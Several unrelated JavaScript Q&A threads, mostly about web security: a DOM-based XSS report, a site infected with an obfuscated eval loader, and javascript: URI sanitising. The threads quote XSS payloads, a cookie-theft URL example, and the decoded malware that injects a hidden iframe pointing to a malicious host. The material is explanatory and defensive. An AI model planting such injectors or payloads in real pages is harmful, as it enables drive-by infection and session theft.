Cross Site Scripting issue with window.location.search - javascript
I have been going through many forums and Wikipedia pages for the past few days trying to understand XSS attacks. I have spent almost 2-3 days on it but still don't have a good idea, as experts suggest multiple solutions, and I want to know how hackers can inject malicious code into a victim's browser. My application has been run through an App Scanner standard testing tool, and it caught many XSS issues. I want to post one of my application's XSS issues here, so can someone please help me understand what exactly I have to do about this issue? I am still trying hard to get a better understanding of XSS issues. This is my code snippet:
function getParameter(param) {
    var val = "";
    var qs = window.location.search;
    var start = qs.indexOf(param);
    if (start != -1) {
        start += param.length + 1;
        var end = qs.indexOf("&", start);
        if (end == -1) {
            end = qs.length;
        }
        val = qs.substring(start,end);
    }
    return val;
}
var formName = getParameter("formName");
var myValue = ''+thisDay+'</td>';
document.getElementById('calendarA').innerHTML = myValue;
And these statements are
var qs = window.location.search;
val = qs.substring(start,end);
var formName = getParameter("formName");
var myValue = ''+thisDay+'</td>';
document.getElementById('calendarA').innerHTML = myValue;
caught by the App Scanner testing tool as possible code for XSS (Cross Site Scripting) issues, but I am not sure how it causes XSS and how I can fix this issue now. Can anybody please provide insights on how this vulnerability can be fixed?
var myValue = ''+thisDay+'</td>';
This line doesn't have any escaping, it expects '(... \''+formName+'\' );...' to be a string. But it can become some other thing:
formName = "'); alert('I\'m free to do anything here'); (''+"
document.getElementById('calendarA').innerHTML = myValue;
Let's place such fragment into myValue:
... <img src=void onerror="alert('hacked')" /> ...
You can check it works:
document.querySelector('button').addEventListener('click', function () {
    document.querySelector('output').innerHTML = document.querySelector('textarea').value;
})
<textarea>... <img src=void onerror="alert('hacked')" /> ...</textarea>
<button>Go</button>
<output></output>
You should never trust any data passed by the URL string. Any site can place any link to your site. Some user clicks it, goes to your site, the parameters are executed in the context of your site, and the attacker can do anything he wants to.
Nothing in the code you've shown us is vulnerable.
You are reading user input, so there is the potential to introduce a vulnerability there. That is probably what the tool you are using is detecting.
If your code is vulnerable, then it will be because of whatever you do with the value of formName next (in the code you haven't shown us).
This is a possible DOM based XSS issue.
If you are using the value of formName like document.getElementById("demo").innerHTML=formName or somehow your DOM elements are being created/modified using the formName you are vulnerable, as I can create a custom URL like http://urwebsite.html?formName=<script>document.cookie_will_be_transfered_to_my_server_here</script> and ask a logged-in person to click it (simple social engineering). Now I have that person's session ID, using which I can do whatever I want.
As a resolution, all the input data from the user has to be html encoded.
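A hardened version of the pattern from the question, as an added example that is not part of the original question or answers: it reads the query parameter by exact name, allowlists formName, and builds the link with DOM APIs instead of innerHTML. The names readParam, isSafeFormName, escapeHtml, renderDayLink and the onPick callback are assumptions for illustration.

```javascript
// Added example, not code from the question or the answers.
// readParam, isSafeFormName, escapeHtml, renderDayLink and onPick are
// hypothetical names chosen for this illustration.

// Read one query parameter by exact name. URLSearchParams also URL-decodes
// the value; the original indexOf() lookup matched the name anywhere in the
// query string (for example inside "xformName=").
function readParam(search, name) {
  const value = new URLSearchParams(search).get(name);
  return value === null ? "" : value;
}

// Allowlist check: a form name is assumed to look like an identifier.
function isSafeFormName(value) {
  return /^[A-Za-z_][A-Za-z0-9_-]{0,63}$/.test(value);
}

// HTML-encode text for the cases where markup must be built as a string.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Build the calendar link with DOM APIs: the day is inserted as text and the
// form name is handed to the click handler as data, never as code.
function renderDayLink(doc, thisDay, formName, onPick) {
  const link = doc.createElement("a");
  link.href = "#";
  link.textContent = String(thisDay);
  link.addEventListener("click", (event) => {
    event.preventDefault();
    onPick(formName, thisDay);
  });
  return link;
}

// Browser-only wiring (skipped when the file is run under Node).
if (typeof document !== "undefined" && typeof window !== "undefined") {
  const formName = readParam(window.location.search, "formName");
  const target = document.getElementById("calendarA");
  if (target && isSafeFormName(formName)) {
    // 15 stands in for the page's thisDay value (constructed sample).
    const link = renderDayLink(document, 15, formName, (name, day) => {
      console.log("picked", name, day);
    });
    target.textContent = "";
    target.appendChild(link);
  }
}
```

A value that fails isSafeFormName is dropped rather than repaired, so nothing derived from the URL reaches the page unless it matches the expected shape.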
Related
bookmarklet: click for random specified links from a host domain
tl;dr: A bookmarklet that opens in a new tab: random link (with specified multiple html-classes) from a specified domain and code that works with current logins. Thank you.

Short version of butchered code:

javascript: (
var % 20 site = domain.com
function() {
    window.location.host == site
    void(window.open(document.links[Math.floor(document.querySelectorAll("a.class1, a.class2"))].href, '_blank'))
}();
//beautified with: http://jsbeautifier.org/

To whom it may concern: I have searched around for a while and even considered switching services but although some come close or are similar to my particular request, none have served to address everything the request entails.

- Execute the script on a specific domain even when no page from said domain is currently open.
- If login authentication for attaining the information or data for execution is required, read or work in conjunction with existing session.
- Fetch from a specific domain host, a random link out of all links on that domain with a certain html-class (or indeed otherwise) using preferably, css-selectors.
- Open the results in a new tab.

From butchering such similarities, the result became something like this:

//bookmarklet
javascript:
//anonymous function+ wrapped code before execution
(
// function global variables for quick substitution
var %20 site = domain.com
function(){
//set domain for script execution
window.location.host == site
//open new tab for
void(window.open(document.links
//random link
[Math.floor
//with specific classes (elements found with css selectors)
(document.querySelectorAll("a.class1, a.class2"))
]//end random-query
.href,'_blank'
//end page-open
)//end link-open
)//end "void"
}//end function definition
//execute
();
//(tried) checked with:
//http://www.javascriptlint.com/online_lint.php

Lastly, I have attained at most, basic css knowledge. I apologise if this request has anybody headdesking, palming or otherwise in gtfo mode.
It is only too sad there is apparently no tag for "Warning: I DIY-ed this stuff" in StackExchange. However, i still would like answers that go into a bit of depth of explaining why and what each correction and modification is. Thank you presently, for your time and effort.
Theoretically, the following code should do what you want:

window.addEventListener('load', function ( ) {
    var query = 'a.class1[href], a.class2[href]';
    var candidates = document.querySelectorAll(query);
    var choice = Math.floor(Math.random() * candidates.length);
    window.open(candidates.item(choice).href, 'randomtab');
}, true);
window.location.href = 'http://domain.com';

But it doesn't, because the possibility to retain event listeners across a page unload could be abused and browsers protect you against such abuse. Instead, you can manually load the domain of your choice and then click a simpler bookmarklet with the following code:

var query = 'a.class1[href], a.class2[href]';
var candidates = document.querySelectorAll(query);
var choice = Math.floor(Math.random() * candidates.length);
window.open(candidates.item(choice).href, 'randomtab');

You could wrap the above in javascript:(function ( ) { ... })(); and minify as before, but it already works if you just minify it and only slap a javascript: in front.

I understand your situation of being an absolute beginner and posting "DIY" code, but I'm still not going to explain step-by-step why this code works and yours doesn't. The first version of the code above is complex to explain to a beginner, and the list of issues with the code in the question is too long to discuss all of them. You'll be better off by studying more Javascript; a good resource with tutorials is MDN.
Site hacked with javascript code inserted
A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help?

<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("[long comma-separated list of hex values removed]".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>

I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated! Thanks.
In my experience, these sort of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them.

Your best bet? Accept that there is definitely going to be an impact to your users, and then do your due diligence:

- Notify your shared host if you're not the owner.
- Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. tar -czf website-$(date +%F).tar.gz ~/ or your shared hosting backup utility.)
- Check for any malicious processes or scripts that could be running. ps gaux is your friend.
- Nuke everything in the shared hosting account.
- Change every password, regardless, even if you think it couldn't have possibly been affected.
- Re-create the account and leave a maintenance page available for your users.
- You should have backups of your account. Unpack the backup within a virtual machine and investigate everything including logs and other information to discover how the attack occurred.
- Apply what you learn to your website code.
- Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, Wordpress or something similar, take this time to upgrade to the latest version.

Do not skip steps, or this will happen again.
This is what was injected. To decipher this, you do the same thing the javascript in your post does. Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code. How it could be used maliciously, I'm not sure. Anyone have any ideas?

function v09() {
    var static = 'ajax';
    var controller = 'index.php';
    var v = document.createElement('iframe');
    v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
    v.style.position = 'absolute';
    v.style.color = '968';
    v.style.height = '968px';
    v.style.width = '968px';
    v.style.left = '1000968';
    v.style.top = '1000968';
    if (!document.getElementById('v')) {
        document.write('<p id=\'v\' class=\'v09\' ></p>');
        document.getElementById('v').appendChild(v);
    }
}
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {
    } else {
        SetCookie('visited_uq', '55', '1', '/');
        v09();
    }
}
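The decoding steps described in the answer above (split on commas, parse each token as hex, subtract 22, map to a character), as an added example that is not part of the original thread: it decodes to text for review without calling eval and lists any URLs found. decodePayload, encodeSample and extractUrls are illustrative names, and the sample input is constructed here with a placeholder host.

```javascript
// Added example, not code from the thread. Decodes the "comma-separated hex
// minus an offset" scheme into plain text for review; nothing is eval'd.
// decodePayload, encodeSample, extractUrls and isWholeNumber are hypothetical names.

// True when `token` is a complete number in `radix`. parseInt alone accepts a
// valid prefix, so "7g" would silently decode as 7.
function isWholeNumber(token, value, radix) {
  const normalized = token.toLowerCase().replace(/^0+(?=.)/, "");
  return !Number.isNaN(value) && value.toString(radix) === normalized;
}

// Decode each token and collect the ones that do not fit the scheme.
function decodePayload(encoded, options = {}) {
  const { radix = 16, offset = 22 } = options;
  const chars = [];
  const rejected = [];
  for (const raw of String(encoded).split(",")) {
    const token = raw.trim();
    if (token === "") continue;
    const value = parseInt(token, radix);
    const code = value - offset;
    if (!isWholeNumber(token, value, radix) || code < 0 || code > 0xffff) {
      rejected.push(token);
      continue;
    }
    chars.push(String.fromCharCode(code));
  }
  return { text: chars.join(""), rejected };
}

// Inverse transform, used only to build the constructed sample below.
function encodeSample(text, options = {}) {
  const { radix = 16, offset = 22 } = options;
  return text
    .split("")
    .map((ch) => (ch.charCodeAt(0) + offset).toString(radix))
    .join(",");
}

// Pull URLs out of decoded script text so they can be blocked or searched
// for in proxy and web server logs.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"<>)]+/g) || [];
}

// Constructed sample (not the payload from the question);
// malicious.example is a placeholder host.
const SAMPLE_SOURCE =
  "var f = document.createElement('iframe'); f.src = 'http://malicious.example/landing.php';";
const SAMPLE_ENCODED = encodeSample(SAMPLE_SOURCE);

const sampleResult = decodePayload(SAMPLE_ENCODED);
console.log(sampleResult.text);
console.log(extractUrls(sampleResult.text));
```

The radix and offset are parameters because the wrapper script computes them indirectly (bqlelz*4 and -(22) in the question's code), and other samples using the same wrapper may use different values.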
This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity. I realized that someone used one of my forms to do code injection (my sites are PHP). This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server. For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages. With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded. You can also make sure to sanitize inputs so that no malicious text can be effective in any of your forms.
Javascript random redirect
so my situation is as follows: I wrote a submission system in php that writes to a textfile rather than a database, the idea of the system is people submit their url to the textfile and then when that script is called on a page, it redirects to a random address out of the textfile; the problem is, I don't know how to make javascript read from the text file and then pick a line to redirect to. Actually, just to clarify, I know how to make javascript read from the text file; but I have NO idea how id write a function to pick a url from the file and forward to it. Seeing as I hit this road block a couple of days ago, the only way I have been handling submissions is checking the text file every 12 hours for new submissions and then manually adding them to this code: setTimeout(function() { var howMany = 38; var page = new Array(howMany+1); page[0]="http://gproxy.nl/"; page[1]="http://homeproxy.me/"; page[2]="http://proxyturbo.com/"; page[3]="http://www.lblocker.info/"; page[4]="http://goprivate.eu/"; page[5]="http://jsproxy.com/"; page[6]="http://openthis.eu/"; page[7]="http://proxy4home.info/"; page[8]="http://dedicatedipaddress.net/"; page[9]="https://www.4everproxy.com/"; page[10]="http://www.surfsearch.info/"; page[11]="http://www.leaveproxy.com/"; page[12]="http://proxyecole.fr/"; page[13]="http://newipnow.com/"; page[14]="http://www.hiddenmode.info/"; page[15]="https://europrox.org/"; page[16]="https://www.4everproxy.com/"; page[17]="https://goingthere.org/"; page[18]="http://xuxor.com/"; page[19]="http://033b.com/"; page[20]="http://thewebtunnel.com/"; page[21]="http://prox.phanteye.com/"; page[22]="http://www.hiddenall.info/"; page[23]="http://www.5966.info/"; page[24]="http://hideyoself.com/"; page[25]="http://prox.phanteye.com/"; page[26]="http://freevideoproxy.com/"; page[27]="http://thewebtunnel.com/"; page[28]="http://openthis.eu/"; page[29]="https://europrox.org/"; page[30]="http://xuxor.com/"; page[31]="https://incloak.com/"; 
page[32]="http://www.leaveproxy.com/"; page[33]="http://www.openunblocker.com/"; page[34]="http://post48.com"; page[35]="http://post48.com"; page[36]="http://inteproxy.com"; page[37]="http://208.73.23.59"; page[38]="http://hidemetoday.com/"; function rndnumber(){ var randscript = -1; while (randscript < 0 || randscript > howMany || isNaN(randscript)){ randscript = parseInt(Math.random()*(howMany+1)); } return randscript; } quo = rndnumber(); quox = page[quo]; window.location=(quox); }, 1500); I would be very grateful if someone would help me write the script or tell me what kind of function I should be googling to look up, googling "How to make javascript read from a textfile and redirect" doesn't really turn up much ; ( Many thanks!
If I understand correctly, first, you'll need a regex to find the URLs in the file. I would refer to this SO post for that: regular expression for url

Once you have that, you can go to any URL with

window.location.href = 'http://google.com';

So, you'll do something like this...

var urlPattern = /((([A-Za-z]{3,9}:(?:\/\/)?)(?:[-;:&=\+\$,\w]+#)?[A-Za-z0-9.-]+|(?:www.|[-;:&=\+\$,\w]+#)[A-Za-z0-9.-]+)((?:\/[\+~%\/.\w-_]*)?\??(?:[-\+=&;%#.\w_]*)#?(?:[\w]*))?)/g;
var urls = data.match(urlPattern);
if (urls) {
    window.location.href = urls[7];
}

Is that what you're looking for? Or you can use a more simple regex like

var urlPat = /https?:\/\/[^'"]+/g

Remember to use the /g flag with your regex to get all occurrences of the urls.
MOSS 07 editform.aspx fails to commit and goes to blank html page
Found solution from Microsoft Blog... see below

OK, to start I don't like the word random but I cannot find any correlation in test cases for this problem so I am going to use random to describe parts of this problem.

The setup: I have a list where I have created a customized UI for the EditForm.aspx and NewForm.aspx. I use the same JS file and JavaScript between the two of them. I have added in a Google map to help illustrate the location selection. I have added extra code to the "OK" button for some dynamic validation. I have done a lot of dynamic menu things as well. All users use IE 9 and the site is on a MOSS 2007 server.

The problem: Only on the EditForm.aspx, clicking OK "Randomly" results in an immediate white screen. The form is not saved and when viewing the source code of the white screen I find a blank html page.

What I have tried to find this problem:
- I tried to narrow down the user and computer this happens on and found that it happens for everyone on every computer (once again "Randomly").
- I tried disabling the code that is pre-pended to the "OK" button
- I tried following the code with the IE9's external script debugger and found no errors

I can provide the code but it is a bit long and I really do not know where to begin. So I can provide it if needed. Thanks for the help ahead of time.

Edit: This is the code re-wiring my OK button (I reset the value to "Save" earlier)

var okBtns = $('input[value="Save"]')
$.each(okBtns, function(index,value){
    okFunction=$(value).attr('onclick');
    $(value).attr('onclick','return false;')
    $(value).bind('click', function(){
        if ($('#'+StatusBox).val()=='Draft') {$('#'+StatusBox).val('New Request')}
        var err = clickOKbutton();
        if(err==0) {okFunction()};
    });
});

This is the clickOKbutton function which is the code prepended to the original SharePoint operations:

function clickOKbutton() {
    //all of the imput validation i could ever wish for!!!!
    var NoteVal = ''
    var NameAry = $('#'+PersonnelBox).parent().children(":first").children("SPAN").children("SPAN");
    $.each(NameAry, function(index,value){
        var $n=$(value).html();
        if(NoteVal.length==0) {NoteVal=$n} else {NoteVal=NoteVal+';'+$n};
    });
    //$('#'+AddNotes).val(NoteVal);
    var plh = $('#'+PersonnelBox).parent().html()
    userNameTx = $('#zz8_Menu').text();
    userNameTx = userNameTx.replace('Welcome ','');
    $.each(OICUsers, function(i,v){
        if(plh.indexOf(v) > -1 && st=='New Request'){
            $('#'+StatusBox).val('OIC Bypassed')
            $('#'+CommentsBox).val('OIC is travling on this TDY/TAD and cannot approve. So this request is bypassing the "OIC Approval" step')
        }
    });
    /*userNameTx = $('#zz8_Menu').text();
    userNameTx = userNameTx.replace('Welcome ','')
    $('#' + ModBox).closest('TR').show();*/
    var message=''
    message = detectFieldChanges(AllFieldsArray,AllOrgValArray,"Draft,New Request,Modified")
    if(message.length>0){
        $('#'+ModBox).val(message);
        AutoResizeTextarea(ModBox);
    }
    message = detectFieldChanges(ValFieldsArray,OrgValuesArray,"Draft,New Request,Modified,OIC Approved,OIC Bypassed,Pending RFI,Ready for COS")
    userNameTx = $('#zz8_Menu').text();
    userNameTx = userNameTx.replace('Welcome ','');
    if(message.length>0&&$.inArray(userNameTx,COSUsers)==-1){
        $('#'+StatusBox).val('Modified').change;
        $('#'+StatusLongBox).val('Modified').change;
    }
    //Subject box
    var pb = NoteVal;
    var ep = $('#'+ExtPersonnel).val();
    var ab = $('#'+AddressBox).val();
    var sd = $('#'+sDateBox).val();
    var ed = $('#'+eDateBox).val();
    var st = $('#'+StatusBox).val();
    var p = pb+';'+ep;
    var p = p.replace(/mossaspnetmembershipprovider:/g,'');
    var p = p.slice(0,-1);
    var ad = ab+' '+sd+' to '+ed;
    var s = 'eTDY | '+st+' - '+p+' - '+ad;
    if(s.length>255){
        var l = s.length-255;
        p = p.substring(0,p.length-l);
        s = 'eTDY | '+p+' - '+ad;
    }
    $('#'+Subject).val(s);
    //check Lat/Lng value
    if($('#'+LatBox).val()=='' || $('#'+LngBox).val()==''){
        //alert("Cannot continue unless the Lat Lng has a vallid coordinate");
        if($('#LatLngError').length==0){
            errorHTML='<br><span class="ms-error" id="LatLngError">You must specify a value for Lat and Lng</span>'
            $('#'+AddressBox).closest('TD').append(errorHTML)
        }
        return -1
    }
    return 0
};

It is messy but hopefully you can make sense of it.

Edit 2: I think I have tracked the randomness down... I completely turned off all custom code and still have the problem. I then tried comparing a working record with a non-working record. Everything looked normal until I got to the field with a multiple people picker. If I have more than 2 people in that field it will save normally, but when I go to make a modification on that record with more than 2 people in the people picker field it causes this problem. I am going to do some more research and will post my results.

Edit 3: http://blogs.msdn.com/b/jorman/archive/2009/12/22/mystery-of-the-sharepoint-white-screens.aspx This problem all boils down to IIS configuration and the Impersonation Level. Apparently our server admins decided to change it without telling anyone.
Usually, when you get [seemingly random] behavior from a web page (especially in MOSS), it means that you have ambiguous events defined on the page. Usually, I get this when I add some kind of JScript to a button or form on_submit. Without seeing your code, I can't really narrow it down further than that. I recommend: look for JavaScript events on your HTML form or on your button click events or look for anchor [a] tags that point to nowhere (href=#) but have javascript. Then decide to do it (strictly) the HTML way (forms, submit buttons) or the javascript way, (no forms, no asp:button) and un-wire the other.
This problem all boils down to IIS configuration and the Impersonation Level. Apparently our server admins decided to change it without telling anyone. http://blogs.msdn.com/b/jorman/archive/2009/12/22/mystery-of-the-sharepoint-white-screens.aspx
Is there a better way to do this? (recursively resolving HTML unicode entities)
I'm parsing an untrusted URI, but its URI-hood must be honored. I'm trying to protect against javascript: links, but I feel like I need to recurse on it, since you could have:

javascriptjavascript::

and after stripping out all instances of javascript: get back our old friend javascript: once again. My other concern is analogously-nested unicode entities. For instance, we could have:

"jAvascript:alert('pwnt')"

...but we could also have:

"j&#塁vascript:alert('pwnt')"

...though I seem to be doing it wrong (whereas a successful attacker obviously won't.)

function resolveEntities(uri) {
    var s = document.createElement('span')
      , nestTally = uri.match(/&/) ? 0 : 1
      , limitReached = false;
    s.innerHTML = uri;
    while (s.textContent.match(/&/)) {
        s.innerHTML = s.textContent;
        if(nestTally++ >= 5) { limitReached = true; break; }
    }
    return encodeURI(s.textContent);
}
Didn't you already ask almost the same question before? Anyway, my suggestion remains the same: use a proper HTML sanitizer. The particular sanitizer I linked to strips javascript: URLs automatically, but you can also set it up to allow only certain whitelisted URL schemes like Thomas suggests. As he notes, this is a good idea, since it's much safer to only allow schemes like http and https which you know to be safe. (In particular, whether a given obscure URL scheme is safe or not may depend not only on the user's browser, but also on their OS and on what third-party software they may have installed — a lot of programs like to register themselves as handlers for their own URL schemes.)
Rather than specifying what you want to blacklist (e.g. javascript: URIs), it's better to specify what you want to whitelist (e.g. http and https only). What about something like this:

function sanitizeUri(uri) {
    if (!uri.match(/^https?:\/\//)) {
        uri = "http://" + uri;
    }
    return uri;
}
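The scheme allowlist recommended in the two answers above, as an added example that is not part of the original thread: the untrusted string is parsed once with the standard URL parser and accepted only if the resulting protocol is http: or https:, so no recursive stripping is needed. safeHref, setLink, ALLOWED_SCHEMES and the base URL https://site.example/ are assumptions for illustration.

```javascript
// Added example, not code from the thread. safeHref, setLink, ALLOWED_SCHEMES
// and the base URL are hypothetical names and values for this illustration.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns a normalized absolute URL string, or null when the input does not
// parse or uses a scheme outside the allowlist.
function safeHref(untrusted, base = "https://site.example/") {
  let parsed;
  try {
    // The parser lowercases the scheme and drops tabs, newlines and leading
    // control characters, so obfuscated spellings collapse to the protocol
    // value a browser would act on.
    parsed = new URL(String(untrusted), base);
  } catch (err) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return null;
  }
  // Return the parser's serialization, never the original string.
  return parsed.href;
}

// Browser-side use: assign through the DOM so no HTML entity decoding pass
// runs over the value after it has been checked.
function setLink(anchor, untrusted) {
  const href = safeHref(untrusted);
  if (href === null) {
    anchor.removeAttribute("href");
    return false;
  }
  anchor.setAttribute("href", href);
  return true;
}
```

Input with no recognizable scheme is resolved against the base and therefore comes back as an https URL on the base host, which is why an entity-encoded spelling gains nothing once the value is set with setAttribute rather than concatenated into markup.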